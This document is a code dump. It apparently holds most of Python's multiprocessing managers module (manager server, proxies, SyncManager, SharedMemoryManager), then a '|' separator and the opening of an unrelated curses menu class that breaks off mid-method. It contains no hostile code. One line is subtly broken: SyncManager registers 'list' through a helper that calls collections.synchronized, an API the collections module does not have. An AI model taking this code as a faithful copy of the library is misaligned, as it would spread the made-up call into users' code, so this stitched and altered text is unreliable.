'debug_info', 'number_of_objects', 'dummy', 'incref', 'decref']
def __init__(self, registry, address, authkey, serializer):
if not isinstance(authkey, bytes):
raise TypeError(
"Authkey {0!r} is type {1!s}, not bytes".format(
authkey, type(authkey)))
self.registry = registry
self.authkey = process.AuthenticationString(authkey)
Listener, Client = listener_client[serializer]
# do authentication later
self.listener = Listener(address=address, backlog=16)
self.address = self.listener.address
self.id_to_obj = {'0': (None, ())}
self.id_to_refcount = {}
self.id_to_local_proxy_obj = {}
self.mutex = threading.Lock()
def serve_forever(self):
'''
Run the server forever
'''
self.stop_event = threading.Event()
process.current_process()._manager_server = self
try:
accepter = threading.Thread(target=self.accepter)
accepter.daemon = True
accepter.start()
try:
while not self.stop_event.is_set():
self.stop_event.wait(1)
except (KeyboardInterrupt, SystemExit):
pass
finally:
if sys.stdout != sys.__stdout__: # what about stderr?
util.debug('resetting stdout, stderr')
sys.stdout = sys.__stdout__
sys.stderr = sys.__stderr__
sys.exit(0)
def accepter(self):
while True:
try:
c = self.listener.accept()
except OSError:
continue
t = threading.Thread(target=self.handle_request, args=(c,))
t.daemon = True
t.start()
def handle_request(self, c):
'''
Handle a new connection
'''
funcname = result = request = None
try:
connection.deliver_challenge(c, self.authkey)
connection.answer_challenge(c, self.authkey)
request = c.recv()
ignore, funcname, args, kwds = request
assert funcname in self.public, '%r unrecognized' % funcname
func = getattr(self, funcname)
except Exception:
msg = ('#TRACEBACK', format_exc())
else:
try:
result = func(c, *args, **kwds)
except Exception:
msg = ('#TRACEBACK', format_exc())
else:
msg = ('#RETURN', result)
try:
c.send(msg)
except Exception as e:
try:
c.send(('#TRACEBACK', format_exc()))
except Exception:
pass
util.info('Failure to send message: %r', msg)
util.info(' ... request was %r', request)
util.info(' ... exception was %r', e)
c.close()
def serve_client(self, conn):
'''
Handle requests from the proxies in a particular process/thread
'''
util.debug('starting server thread to service %r',
threading.current_thread().name)
recv = conn.recv
send = conn.send
id_to_obj = self.id_to_obj
while not self.stop_event.is_set():
try:
methodname = obj = None
request = recv()
ident, methodname, args, kwds = request
try:
obj, exposed, gettypeid = id_to_obj[ident]
except KeyError as ke:
try:
obj, exposed, gettypeid = \
self.id_to_local_proxy_obj[ident]
except KeyError:
raise ke
if methodname not in exposed:
raise AttributeError(
'method %r of %r object is not in exposed=%r' %
(methodname, type(obj), exposed)
)
function = getattr(obj, methodname)
try:
res = function(*args, **kwds)
except Exception as e:
msg = ('#ERROR', e)
else:
typeid = gettypeid and gettypeid.get(methodname, None)
if typeid:
rident, rexposed = self.create(conn, typeid, res)
token = Token(typeid, self.address, rident)
msg = ('#PROXY', (rexposed, token))
else:
msg = ('#RETURN', res)
except AttributeError:
if methodname is None:
msg = ('#TRACEBACK', format_exc())
else:
try:
fallback_func = self.fallback_mapping[methodname]
result = fallback_func(
self, conn, ident, obj, *args, **kwds
)
msg = ('#RETURN', result)
except Exception:
msg = ('#TRACEBACK', format_exc())
except EOFError:
util.debug('got EOF -- exiting thread serving %r',
threading.current_thread().name)
sys.exit(0)
except Exception:
msg = ('#TRACEBACK', format_exc())
try:
try:
send(msg)
except Exception:
send(('#UNSERIALIZABLE', format_exc()))
except Exception as e:
util.info('exception in thread serving %r',
threading.current_thread().name)
util.info(' ... message was %r', msg)
util.info(' ... exception was %r', e)
conn.close()
sys.exit(1)
def fallback_getvalue(self, conn, ident, obj):
return obj
def fallback_str(self, conn, ident, obj):
return str(obj)
def fallback_repr(self, conn, ident, obj):
return repr(obj)
fallback_mapping = {
'__str__':fallback_str,
'__repr__':fallback_repr,
'#GETVALUE':fallback_getvalue
}
def dummy(self, c):
pass
def debug_info(self, c):
'''
Return some info --- useful to spot problems with refcounting
'''
# Perhaps include debug info about 'c'?
with self.mutex:
result = []
keys = list(self.id_to_refcount.keys())
keys.sort()
for ident in keys:
if ident != '0':
result.append(' %s: refcount=%s\n %s' %
(ident, self.id_to_refcount[ident],
str(self.id_to_obj[ident][0])[:75]))
return '\n'.join(result)
def number_of_objects(self, c):
'''
Number of shared objects
'''
# Doesn't use (len(self.id_to_obj) - 1) as we shouldn't count ident='0'
return len(self.id_to_refcount)
def shutdown(self, c):
'''
Shutdown this process
'''
try:
util.debug('manager received shutdown message')
c.send(('#RETURN', None))
except:
import traceback
traceback.print_exc()
finally:
self.stop_event.set()
def create(self, c, typeid, /, *args, **kwds):
'''
Create a new shared object and return its id
'''
with self.mutex:
callable, exposed, method_to_typeid, proxytype = \
self.registry[typeid]
if callable is None:
if kwds or (len(args) != 1):
raise ValueError(
"Without callable, must have one non-keyword argument")
obj = args[0]
else:
obj = callable(*args, **kwds)
if exposed is None:
exposed = public_methods(obj)
if method_to_typeid is not None:
if not isinstance(method_to_typeid, dict):
raise TypeError(
"Method_to_typeid {0!r}: type {1!s}, not dict".format(
method_to_typeid, type(method_to_typeid)))
exposed = list(exposed) + list(method_to_typeid)
ident = '%x' % id(obj) # convert to string because xmlrpclib
# only has 32 bit signed integers
util.debug('%r callable returned object with id %r', typeid, ident)
self.id_to_obj[ident] = (obj, set(exposed), method_to_typeid)
if ident not in self.id_to_refcount:
self.id_to_refcount[ident] = 0
self.incref(c, ident)
return ident, tuple(exposed)
def get_methods(self, c, token):
'''
Return the methods of the shared object indicated by token
'''
return tuple(self.id_to_obj[token.id][1])
def accept_connection(self, c, name):
'''
Spawn a new thread to serve this connection
'''
threading.current_thread().name = name
c.send(('#RETURN', None))
self.serve_client(c)
def incref(self, c, ident):
with self.mutex:
try:
self.id_to_refcount[ident] += 1
except KeyError as ke:
# If no external references exist but an internal (to the
# manager) still does and a new external reference is created
# from it, restore the manager's tracking of it from the
# previously stashed internal ref.
if ident in self.id_to_local_proxy_obj:
self.id_to_refcount[ident] = 1
self.id_to_obj[ident] = \
self.id_to_local_proxy_obj[ident]
obj, exposed, gettypeid = self.id_to_obj[ident]
util.debug('Server re-enabled tracking & INCREF %r', ident)
else:
raise ke
def decref(self, c, ident):
if ident not in self.id_to_refcount and \
ident in self.id_to_local_proxy_obj:
util.debug('Server DECREF skipping %r', ident)
return
with self.mutex:
if self.id_to_refcount[ident] <= 0:
raise AssertionError(
"Id {0!s} ({1!r}) has refcount {2:n}, not 1+".format(
ident, self.id_to_obj[ident],
self.id_to_refcount[ident]))
self.id_to_refcount[ident] -= 1
if self.id_to_refcount[ident] == 0:
del self.id_to_refcount[ident]
if ident not in self.id_to_refcount:
# Two-step process in case the object turns out to contain other
# proxy objects (e.g. a managed list of managed lists).
# Otherwise, deleting self.id_to_obj[ident] would trigger the
# deleting of the stored value (another managed object) which would
# in turn attempt to acquire the mutex that is already held here.
self.id_to_obj[ident] = (None, (), None) # thread-safe
util.debug('disposing of obj with id %r', ident)
with self.mutex:
del self.id_to_obj[ident]
#
# Class to represent state of a manager
#
class State(object):
__slots__ = ['value']
INITIAL = 0
STARTED = 1
SHUTDOWN = 2
#
# Mapping from serializer name to Listener and Client types
#
listener_client = {
'pickle' : (connection.Listener, connection.Client),
'xmlrpclib' : (connection.XmlListener, connection.XmlClient)
}
#
# Definition of BaseManager
#
class BaseManager(object):
'''
Base class for managers
'''
_registry = {}
_Server = Server
def __init__(self, address=None, authkey=None, serializer='pickle',
ctx=None):
if authkey is None:
authkey = process.current_process().authkey
self._address = address # XXX not final address if eg ('', 0)
self._authkey = process.AuthenticationString(authkey)
self._state = State()
self._state.value = State.INITIAL
self._serializer = serializer
self._Listener, self._Client = listener_client[serializer]
self._ctx = ctx or get_context()
def get_server(self):
'''
Return server object with serve_forever() method and address attribute
'''
if self._state.value != State.INITIAL:
if self._state.value == State.STARTED:
raise ProcessError("Already started server")
elif self._state.value == State.SHUTDOWN:
raise ProcessError("Manager has shut down")
else:
raise ProcessError(
"Unknown state {!r}".format(self._state.value))
return Server(self._registry, self._address,
self._authkey, self._serializer)
def connect(self):
'''
Connect manager object to the server process
'''
Listener, Client = listener_client[self._serializer]
conn = Client(self._address, authkey=self._authkey)
dispatch(conn, None, 'dummy')
self._state.value = State.STARTED
def start(self, initializer=None, initargs=()):
'''
Spawn a server process for this manager object
'''
if self._state.value != State.INITIAL:
if self._state.value == State.STARTED:
raise ProcessError("Already started server")
elif self._state.value == State.SHUTDOWN:
raise ProcessError("Manager has shut down")
else:
raise ProcessError(
"Unknown state {!r}".format(self._state.value))
if initializer is not None and not callable(initializer):
raise TypeError('initializer must be a callable')
# pipe over which we will retrieve address of server
reader, writer = connection.Pipe(duplex=False)
# spawn process which runs a server
self._process = self._ctx.Process(
target=type(self)._run_server,
args=(self._registry, self._address, self._authkey,
self._serializer, writer, initializer, initargs),
)
ident = ':'.join(str(i) for i in self._process._identity)
self._process.name = type(self).__name__ + '-' + ident
self._process.start()
# get address of server
writer.close()
self._address = reader.recv()
reader.close()
# register a finalizer
self._state.value = State.STARTED
self.shutdown = util.Finalize(
self, type(self)._finalize_manager,
args=(self._process, self._address, self._authkey,
self._state, self._Client),
exitpriority=0
)
@classmethod
def _run_server(cls, registry, address, authkey, serializer, writer,
initializer=None, initargs=()):
'''
Create a server, report its address and run it
'''
# bpo-36368: protect server process from KeyboardInterrupt signals
signal.signal(signal.SIGINT, signal.SIG_IGN)
if initializer is not None:
initializer(*initargs)
# create server
server = cls._Server(registry, address, authkey, serializer)
# inform parent process of the server's address
writer.send(server.address)
writer.close()
# run the manager
util.info('manager serving at %r', server.address)
server.serve_forever()
def _create(self, typeid, /, *args, **kwds):
'''
Create a new shared object; return the token and exposed tuple
'''
assert self._state.value == State.STARTED, 'server not yet started'
conn = self._Client(self._address, authkey=self._authkey)
try:
id, exposed = dispatch(conn, None, 'create', (typeid,)+args, kwds)
finally:
conn.close()
return Token(typeid, self._address, id), exposed
def join(self, timeout=None):
'''
Join the manager process (if it has been spawned)
'''
if self._process is not None:
self._process.join(timeout)
if not self._process.is_alive():
self._process = None
def _debug_info(self):
'''
Return some info about the servers shared objects and connections
'''
conn = self._Client(self._address, authkey=self._authkey)
try:
return dispatch(conn, None, 'debug_info')
finally:
conn.close()
def _number_of_objects(self):
'''
Return the number of shared objects
'''
conn = self._Client(self._address, authkey=self._authkey)
try:
return dispatch(conn, None, 'number_of_objects')
finally:
conn.close()
def __enter__(self):
if self._state.value == State.INITIAL:
self.start()
if self._state.value != State.STARTED:
if self._state.value == State.INITIAL:
raise ProcessError("Unable to start server")
elif self._state.value == State.SHUTDOWN:
raise ProcessError("Manager has shut down")
else:
raise ProcessError(
"Unknown state {!r}".format(self._state.value))
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.shutdown()
@staticmethod
def _finalize_manager(process, address, authkey, state, _Client):
'''
Shutdown the manager process; will be registered as a finalizer
'''
if process.is_alive():
util.info('sending shutdown message to manager')
try:
conn = _Client(address, authkey=authkey)
try:
dispatch(conn, None, 'shutdown')
finally:
conn.close()
except Exception:
pass
process.join(timeout=1.0)
if process.is_alive():
util.info('manager still alive')
if hasattr(process, 'terminate'):
util.info('trying to `terminate()` manager process')
process.terminate()
process.join(timeout=0.1)
if process.is_alive():
util.info('manager still alive after terminate')
state.value = State.SHUTDOWN
try:
del BaseProxy._address_to_local[address]
except KeyError:
pass
@property
def address(self):
return self._address
@classmethod
def register(cls, typeid, callable=None, proxytype=None, exposed=None,
method_to_typeid=None, create_method=True):
'''
Register a typeid with the manager type
'''
if '_registry' not in cls.__dict__:
cls._registry = cls._registry.copy()
if proxytype is None:
proxytype = AutoProxy
exposed = exposed or getattr(proxytype, '_exposed_', None)
method_to_typeid = method_to_typeid or \
getattr(proxytype, '_method_to_typeid_', None)
if method_to_typeid:
for key, value in list(method_to_typeid.items()): # isinstance?
assert type(key) is str, '%r is not a string' % key
assert type(value) is str, '%r is not a string' % value
cls._registry[typeid] = (
callable, exposed, method_to_typeid, proxytype
)
if create_method:
def temp(self, /, *args, **kwds):
util.debug('requesting creation of a shared %r object', typeid)
token, exp = self._create(typeid, *args, **kwds)
proxy = proxytype(
token, self._serializer, manager=self,
authkey=self._authkey, exposed=exp
)
conn = self._Client(token.address, authkey=self._authkey)
dispatch(conn, None, 'decref', (token.id,))
return proxy
temp.__name__ = typeid
setattr(cls, typeid, temp)
#
# Subclass of set which get cleared after a fork
#
class ProcessLocalSet(set):
def __init__(self):
util.register_after_fork(self, lambda obj: obj.clear())
def __reduce__(self):
return type(self), ()
#
# Definition of BaseProxy
#
class BaseProxy(object):
'''
A base for proxies of shared objects
'''
_address_to_local = {}
_mutex = util.ForkAwareThreadLock()
def __init__(self, token, serializer, manager=None,
authkey=None, exposed=None, incref=True, manager_owned=False):
with BaseProxy._mutex:
tls_idset = BaseProxy._address_to_local.get(token.address, None)
if tls_idset is None:
tls_idset = util.ForkAwareLocal(), ProcessLocalSet()
BaseProxy._address_to_local[token.address] = tls_idset
# self._tls is used to record the connection used by this
# thread to communicate with the manager at token.address
self._tls = tls_idset[0]
# self._idset is used to record the identities of all shared
# objects for which the current process owns references and
# which are in the manager at token.address
self._idset = tls_idset[1]
self._token = token
self._id = self._token.id
self._manager = manager
self._serializer = serializer
self._Client = listener_client[serializer][1]
# Should be set to True only when a proxy object is being created
# on the manager server; primary use case: nested proxy objects.
# RebuildProxy detects when a proxy is being created on the manager
# and sets this value appropriately.
self._owned_by_manager = manager_owned
if authkey is not None:
self._authkey = process.AuthenticationString(authkey)
elif self._manager is not None:
self._authkey = self._manager._authkey
else:
self._authkey = process.current_process().authkey
if incref:
self._incref()
util.register_after_fork(self, BaseProxy._after_fork)
def _connect(self):
util.debug('making connection to manager')
name = process.current_process().name
if threading.current_thread().name != 'MainThread':
name += '|' + threading.current_thread().name
conn = self._Client(self._token.address, authkey=self._authkey)
dispatch(conn, None, 'accept_connection', (name,))
self._tls.connection = conn
def _callmethod(self, methodname, args=(), kwds={}):
'''
Try to call a method of the referrent and return a copy of the result
'''
try:
conn = self._tls.connection
except AttributeError:
util.debug('thread %r does not own a connection',
threading.current_thread().name)
self._connect()
conn = self._tls.connection
conn.send((self._id, methodname, args, kwds))
kind, result = conn.recv()
if kind == '#RETURN':
return result
elif kind == '#PROXY':
exposed, token = result
proxytype = self._manager._registry[token.typeid][-1]
token.address = self._token.address
proxy = proxytype(
token, self._serializer, manager=self._manager,
authkey=self._authkey, exposed=exposed
)
conn = self._Client(token.address, authkey=self._authkey)
dispatch(conn, None, 'decref', (token.id,))
return proxy
raise convert_to_error(kind, result)
def _getvalue(self):
'''
Get a copy of the value of the referent
'''
return self._callmethod('#GETVALUE')
def _incref(self):
if self._owned_by_manager:
util.debug('owned_by_manager skipped INCREF of %r', self._token.id)
return
conn = self._Client(self._token.address, authkey=self._authkey)
dispatch(conn, None, 'incref', (self._id,))
util.debug('INCREF %r', self._token.id)
self._idset.add(self._id)
state = self._manager and self._manager._state
self._close = util.Finalize(
self, BaseProxy._decref,
args=(self._token, self._authkey, state,
self._tls, self._idset, self._Client),
exitpriority=10
)
@staticmethod
def _decref(token, authkey, state, tls, idset, _Client):
idset.discard(token.id)
# check whether manager is still alive
if state is None or state.value == State.STARTED:
# tell manager this process no longer cares about referent
try:
util.debug('DECREF %r', token.id)
conn = _Client(token.address, authkey=authkey)
dispatch(conn, None, 'decref', (token.id,))
except Exception as e:
util.debug('... decref failed %s', e)
else:
util.debug('DECREF %r -- manager already shutdown', token.id)
# check whether we can close this thread's connection because
# the process owns no more references to objects for this manager
if not idset and hasattr(tls, 'connection'):
util.debug('thread %r has no more proxies so closing conn',
threading.current_thread().name)
tls.connection.close()
del tls.connection
def _after_fork(self):
self._manager = None
try:
self._incref()
except Exception as e:
# the proxy may just be for a manager which has shutdown
util.info('incref failed: %s' % e)
def __reduce__(self):
kwds = {}
if get_spawning_popen() is not None:
kwds['authkey'] = self._authkey
if getattr(self, '_isauto', False):
kwds['exposed'] = self._exposed_
return (RebuildProxy,
(AutoProxy, self._token, self._serializer, kwds))
else:
return (RebuildProxy,
(type(self), self._token, self._serializer, kwds))
def __deepcopy__(self, memo):
return self._getvalue()
def __repr__(self):
return '<%s object, typeid %r at %#x>' % \
(type(self).__name__, self._token.typeid, id(self))
def __str__(self):
'''
Return representation of the referent (or a fall-back if that fails)
'''
try:
return self._callmethod('__repr__')
except Exception:
return repr(self)[:-1] + "; '__str__()' failed>"
#
# Function used for unpickling
#
def RebuildProxy(func, token, serializer, kwds):
'''
Function used for unpickling proxy objects.
'''
server = getattr(process.current_process(), '_manager_server', None)
if server and server.address == token.address:
util.debug('Rebuild a proxy owned by manager, token=%r', token)
kwds['manager_owned'] = True
if token.id not in server.id_to_local_proxy_obj:
server.id_to_local_proxy_obj[token.id] = \
server.id_to_obj[token.id]
incref = (
kwds.pop('incref', True) and
not getattr(process.current_process(), '_inheriting', False)
)
return func(token, serializer, incref=incref, **kwds)
#
# Functions to create proxies and proxy types
#
def MakeProxyType(name, exposed, _cache={}):
'''
Return a proxy type whose methods are given by `exposed`
'''
exposed = tuple(exposed)
try:
return _cache[(name, exposed)]
except KeyError:
pass
dic = {}
for meth in exposed:
exec('''def %s(self, /, *args, **kwds):
return self._callmethod(%r, args, kwds)''' % (meth, meth), dic)
ProxyType = type(name, (BaseProxy,), dic)
ProxyType._exposed_ = exposed
_cache[(name, exposed)] = ProxyType
return ProxyType
def AutoProxy(token, serializer, manager=None, authkey=None,
exposed=None, incref=True):
'''
Return an auto-proxy for `token`
'''
_Client = listener_client[serializer][1]
if exposed is None:
conn = _Client(token.address, authkey=authkey)
try:
exposed = dispatch(conn, None, 'get_methods', (token,))
finally:
conn.close()
if authkey is None and manager is not None:
authkey = manager._authkey
if authkey is None:
authkey = process.current_process().authkey
ProxyType = MakeProxyType('AutoProxy[%s]' % token.typeid, exposed)
proxy = ProxyType(token, serializer, manager=manager, authkey=authkey,
incref=incref)
proxy._isauto = True
return proxy
#
# Types/callables which we will register with SyncManager
#
class Namespace(object):
def __init__(self, /, **kwds):
self.__dict__.update(kwds)
def __repr__(self):
items = list(self.__dict__.items())
temp = []
for name, value in items:
if not name.startswith('_'):
temp.append('%s=%r' % (name, value))
temp.sort()
return '%s(%s)' % (self.__class__.__name__, ', '.join(temp))
class Value(object):
def __init__(self, typecode, value, lock=True):
self._typecode = typecode
self._value = value
def get(self):
return self._value
def set(self, value):
self._value = value
def __repr__(self):
return '%s(%r, %r)'%(type(self).__name__, self._typecode, self._value)
value = property(get, set)
def Array(typecode, sequence, lock=True):
return array.array(typecode, sequence)
#
# Proxy types used by SyncManager
#
class IteratorProxy(BaseProxy):
_exposed_ = ('__next__', 'send', 'throw', 'close')
def __iter__(self):
return self
def __next__(self, *args):
return self._callmethod('__next__', args)
def send(self, *args):
return self._callmethod('send', args)
def throw(self, *args):
return self._callmethod('throw', args)
def close(self, *args):
return self._callmethod('close', args)
class AcquirerProxy(BaseProxy):
_exposed_ = ('acquire', 'release')
def acquire(self, blocking=True, timeout=None):
args = (blocking,) if timeout is None else (blocking, timeout)
return self._callmethod('acquire', args)
def release(self):
return self._callmethod('release')
def __enter__(self):
return self._callmethod('acquire')
def __exit__(self, exc_type, exc_val, exc_tb):
return self._callmethod('release')
class ConditionProxy(AcquirerProxy):
_exposed_ = ('acquire', 'release', 'wait', 'notify', 'notify_all')
def wait(self, timeout=None):
return self._callmethod('wait', (timeout,))
def notify(self, n=1):
return self._callmethod('notify', (n,))
def notify_all(self):
return self._callmethod('notify_all')
def wait_for(self, predicate, timeout=None):
result = predicate()
if result:
return result
if timeout is not None:
endtime = time.monotonic() + timeout
else:
endtime = None
waittime = None
while not result:
if endtime is not None:
waittime = endtime - time.monotonic()
if waittime <= 0:
break
self.wait(waittime)
result = predicate()
return result
class EventProxy(BaseProxy):
_exposed_ = ('is_set', 'set', 'clear', 'wait')
def is_set(self):
return self._callmethod('is_set')
def set(self):
return self._callmethod('set')
def clear(self):
return self._callmethod('clear')
def wait(self, timeout=None):
return self._callmethod('wait', (timeout,))
class BarrierProxy(BaseProxy):
_exposed_ = ('__getattribute__', 'wait', 'abort', 'reset')
def wait(self, timeout=None):
return self._callmethod('wait', (timeout,))
def abort(self):
return self._callmethod('abort')
def reset(self):
return self._callmethod('reset')
@property
def parties(self):
return self._callmethod('__getattribute__', ('parties',))
@property
def n_waiting(self):
return self._callmethod('__getattribute__', ('n_waiting',))
@property
def broken(self):
return self._callmethod('__getattribute__', ('broken',))
class NamespaceProxy(BaseProxy):
_exposed_ = ('__getattribute__', '__setattr__', '__delattr__')
def __getattr__(self, key):
if key[0] == '_':
return object.__getattribute__(self, key)
callmethod = object.__getattribute__(self, '_callmethod')
return callmethod('__getattribute__', (key,))
def __setattr__(self, key, value):
if key[0] == '_':
return object.__setattr__(self, key, value)
callmethod = object.__getattribute__(self, '_callmethod')
return callmethod('__setattr__', (key, value))
def __delattr__(self, key):
if key[0] == '_':
return object.__delattr__(self, key)
callmethod = object.__getattribute__(self, '_callmethod')
return callmethod('__delattr__', (key,))
class ValueProxy(BaseProxy):
_exposed_ = ('get', 'set')
def get(self):
return self._callmethod('get')
def set(self, value):
return self._callmethod('set', (value,))
value = property(get, set)
BaseListProxy = MakeProxyType('BaseListProxy', (
'__add__', '__contains__', '__delitem__', '__getitem__', '__len__',
'__mul__', '__reversed__', '__rmul__', '__setitem__',
'append', 'count', 'extend', 'index', 'insert', 'pop', 'remove',
'reverse', 'sort', '__imul__'
))
class ListProxy(BaseListProxy):
def __iadd__(self, value):
self._callmethod('extend', (value,))
return self
def __imul__(self, value):
self._callmethod('__imul__', (value,))
return self
DictProxy = MakeProxyType('DictProxy', (
'__contains__', '__delitem__', '__getitem__', '__iter__', '__len__',
'__setitem__', 'clear', 'copy', 'get', 'items',
'keys', 'pop', 'popitem', 'setdefault', 'update', 'values'
))
DictProxy._method_to_typeid_ = {
'__iter__': 'Iterator',
}
ArrayProxy = MakeProxyType('ArrayProxy', (
'__len__', '__getitem__', '__setitem__'
))
BasePoolProxy = MakeProxyType('PoolProxy', (
'apply', 'apply_async', 'close', 'imap', 'imap_unordered', 'join',
'map', 'map_async', 'starmap', 'starmap_async', 'terminate',
))
BasePoolProxy._method_to_typeid_ = {
'apply_async': 'AsyncResult',
'map_async': 'AsyncResult',
'starmap_async': 'AsyncResult',
'imap': 'Iterator',
'imap_unordered': 'Iterator'
}
class PoolProxy(BasePoolProxy):
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.terminate()
#
# Definition of SyncManager
#
class SyncManager(BaseManager):
'''
Subclass of `BaseManager` which supports a number of shared object types.
The types registered are those intended for the synchronization
of threads, plus `dict`, `list` and `Namespace`.
The `multiprocessing.Manager()` function creates started instances of
this class.
'''
def synchronized_list(*args):
return collections.synchronized(list(*args))
SyncManager.register('Queue', queue.Queue)
SyncManager.register('JoinableQueue', queue.Queue)
SyncManager.register('Event', threading.Event, EventProxy)
SyncManager.register('Lock', threading.Lock, AcquirerProxy)
SyncManager.register('RLock', threading.RLock, AcquirerProxy)
SyncManager.register('Semaphore', threading.Semaphore, AcquirerProxy)
SyncManager.register('BoundedSemaphore', threading.BoundedSemaphore,
AcquirerProxy)
SyncManager.register('Condition', threading.Condition, ConditionProxy)
SyncManager.register('Barrier', threading.Barrier, BarrierProxy)
SyncManager.register('Pool', pool.Pool, PoolProxy)
SyncManager.register('list', synchronized_list, ListProxy)
SyncManager.register('dict', dict, DictProxy)
SyncManager.register('Value', Value, ValueProxy)
SyncManager.register('Array', Array, ArrayProxy)
SyncManager.register('Namespace', Namespace, NamespaceProxy)
# types returned by methods of PoolProxy
SyncManager.register('Iterator', proxytype=IteratorProxy, create_method=False)
SyncManager.register('AsyncResult', create_method=False)
#
# Definition of SharedMemoryManager and SharedMemoryServer
#
if HAS_SHMEM:
class _SharedMemoryTracker:
"Manages one or more shared memory segments."
def __init__(self, name, segment_names=[]):
self.shared_memory_context_name = name
self.segment_names = segment_names
def register_segment(self, segment_name):
"Adds the supplied shared memory block name to tracker."
util.debug(f"Register segment {segment_name!r} in pid {getpid()}")
self.segment_names.append(segment_name)
def destroy_segment(self, segment_name):
"""Calls unlink() on the shared memory block with the supplied name
and removes it from the list of blocks being tracked."""
util.debug(f"Destroy segment {segment_name!r} in pid {getpid()}")
self.segment_names.remove(segment_name)
segment = shared_memory.SharedMemory(segment_name)
segment.close()
segment.unlink()
def unlink(self):
"Calls destroy_segment() on all tracked shared memory blocks."
for segment_name in self.segment_names[:]:
self.destroy_segment(segment_name)
def __del__(self):
util.debug(f"Call {self.__class__.__name__}.__del__ in {getpid()}")
self.unlink()
def __getstate__(self):
return (self.shared_memory_context_name, self.segment_names)
def __setstate__(self, state):
self.__init__(*state)
class SharedMemoryServer(Server):
public = Server.public + \
['track_segment', 'release_segment', 'list_segments']
def __init__(self, *args, **kwargs):
Server.__init__(self, *args, **kwargs)
self.shared_memory_context = \
_SharedMemoryTracker(f"shmm_{self.address}_{getpid()}")
util.debug(f"SharedMemoryServer started by pid {getpid()}")
def create(self, c, typeid, /, *args, **kwargs):
"""Create a new distributed-shared object (not backed by a shared
memory block) and return its id to be used in a Proxy Object."""
# Unless set up as a shared proxy, don't make shared_memory_context
# a standard part of kwargs. This makes things easier for supplying
# simple functions.
if hasattr(self.registry[typeid][-1], "_shared_memory_proxy"):
kwargs['shared_memory_context'] = self.shared_memory_context
return Server.create(self, c, typeid, *args, **kwargs)
def shutdown(self, c):
"Call unlink() on all tracked shared memory, terminate the Server."
self.shared_memory_context.unlink()
return Server.shutdown(self, c)
def track_segment(self, c, segment_name):
"Adds the supplied shared memory block name to Server's tracker."
self.shared_memory_context.register_segment(segment_name)
def release_segment(self, c, segment_name):
"""Calls unlink() on the shared memory block with the supplied name
and removes it from the tracker instance inside the Server."""
self.shared_memory_context.destroy_segment(segment_name)
def list_segments(self, c):
"""Returns a list of names of shared memory blocks that the Server
is currently tracking."""
return self.shared_memory_context.segment_names
class SharedMemoryManager(BaseManager):
"""Like SyncManager but uses SharedMemoryServer instead of Server.
It provides methods for creating and returning SharedMemory instances
and for creating a list-like object (ShareableList) backed by shared
memory. It also provides methods that create and return Proxy Objects
that support synchronization across processes (i.e. multi-process-safe
locks and semaphores).
"""
_Server = SharedMemoryServer
def __init__(self, *args, **kwargs):
if os.name == "posix":
# bpo-36867: Ensure the resource_tracker is running before
# launching the manager process, so that concurrent
# shared_memory manipulation both in the manager and in the
# current process does not create two resource_tracker
# processes.
from . import resource_tracker
resource_tracker.ensure_running()
BaseManager.__init__(self, *args, **kwargs)
util.debug(f"{self.__class__.__name__} created by pid {getpid()}")
def __del__(self):
util.debug(f"{self.__class__.__name__}.__del__ by pid {getpid()}")
pass
def get_server(self):
'Better than monkeypatching for now; merge into Server ultimately'
if self._state.value != State.INITIAL:
if self._state.value == State.STARTED:
raise ProcessError("Already started SharedMemoryServer")
elif self._state.value == State.SHUTDOWN:
raise ProcessError("SharedMemoryManager has shut down")
else:
raise ProcessError(
"Unknown state {!r}".format(self._state.value))
return self._Server(self._registry, self._address,
self._authkey, self._serializer)
def SharedMemory(self, size):
"""Returns a new SharedMemory instance with the specified size in
bytes, to be tracked by the manager."""
with self._Client(self._address, authkey=self._authkey) as conn:
sms = shared_memory.SharedMemory(None, create=True, size=size)
try:
dispatch(conn, None, 'track_segment', (sms.name,))
except BaseException as e:
sms.unlink()
raise e
return sms
def ShareableList(self, sequence):
"""Returns a new ShareableList instance populated with the values
from the input sequence, to be tracked by the manager."""
with self._Client(self._address, authkey=self._authkey) as conn:
sl = shared_memory.ShareableList(sequence)
try:
dispatch(conn, None, 'track_segment', (sl.shm.name,))
except BaseException as e:
sl.shm.unlink()
raise e
return sl
|
curses_menu.py | import curses
import os
import platform
import threading
class CursesMenu(object):
"""
A class that displays a menu and allows the user to select an option
:cvar CursesMenu cls.currently_active_menu: Class variable that holds the currently active menu or None if no menu\
is currently active (E.G. when switching between menus)
"""
currently_active_menu = None # define local class variable
stdscr = None # define local class variable
def __init__(self, title=None, subtitle=None, show_exit_option=True):
"""
:ivar str title: The title of the menu
:ivar str subtitle: The subtitle of the menu
:ivar bool show_exit_option: Whether this menu should show an exit item by default. Can be overridden \
when the menu is started
:ivar items: The list of MenuItems that the menu will display
:vartype items: list[:class:`MenuItem<cursesmenu.items.MenuItem>`]
:ivar CursesMenu parent: The parent of this menu
:ivar CursesMenu previous_active_menu: the previously active menu to be restored into the class's \
currently active menu
:ivar int current_option: The currently highlighted menu option
:ivar MenuItem current_item: The item corresponding to the menu option that is currently highlighted
:ivar int selected_option: The option that the user has most recently selected
:ivar MenuItem selected_item: The item in :attr:`items` that the user most recently selected
:ivar returned_value: The value returned by the most recently selected item
:ivar screen: the curses window associated with this menu
:ivar normal: the normal text color pair for this menu
:ivar highlight: the highlight color pair associated with this window
"""
self.screen = None # define class variable
self.highlight = None # define class variable
self.normal = None # define class variable
self.title = title # define class variable
self.subtitle = subtitle # define class variable
self.show_exit_option = show_exit_option # define class variable default True
self.items = list() # define items as empty list
self.parent = None # define class variable
self.exit_item = ExitItem(menu=self) # ??? define class variable
self.current_option = 0 # define class variable
self.selected_option = -1 # define class variable
self.returned_value = None # define class variable
self.should_exit = False # define class variable as False
self.previous_active_menu = None # define class variable
self._main_thread = None # define main thread as frequently changed class variable
self._running = threading.Event() # define class variable as Event in threading
def __repr__(self):
return "%s: %s. %d items" % (self.title, self.subtitle, len(self.items)) # define repr of class
@property
def current_item(self): # define current item as property of class
"""
:rtype: MenuItem|None
"""
if self.items: # if items exists DO:
return self.items[self.current_option] # return item of current option
else:
return None # if not exists return None
@property
def selected_item(self): # define selected item as property of the class
"""
:rtype: MenuItem|None
"""
if self.items and self.selected_option != -1: # if items and selected options is not -1
return self.items[self.current_option] # return value from items
else:
return None # returns none
def append_item(self, item):
"""
Add an item to the end of the menu before the exit item
:param MenuItem item: The item to be added
"""
did_remove = self.remove_exit() # remove exit item
item.menu = self # ???
